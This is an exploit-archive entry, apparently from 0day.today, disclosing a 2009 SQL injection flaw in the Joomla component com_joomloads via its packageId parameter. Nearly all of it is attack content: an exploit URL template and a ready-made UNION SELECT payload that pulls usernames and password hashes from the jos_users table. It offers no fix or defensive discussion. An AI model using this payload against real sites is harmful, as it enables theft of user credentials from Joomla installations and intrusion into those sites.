id: 5531
date: 07/22/2009
title: Joomla Component com_joomloads (packageId) SQL Injection Vuln
author: Mr.tro0oqy
cves: 

=============================================================
Joomla Component com_joomloads (packageId) SQL Injection Vuln
=============================================================


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : Joomla Component com_joomloads (packageId) Remote SQL Injection Vuln

[+] Found by : Mr.tro0oqy  
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
http://localhost/path/index.php?option=com_joomloads&view=package&Itemid=2&packageId=<SQL CODE>



demo:
-----
http://www.xxx.com/index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--




#  0day.today [2023-03-23]  #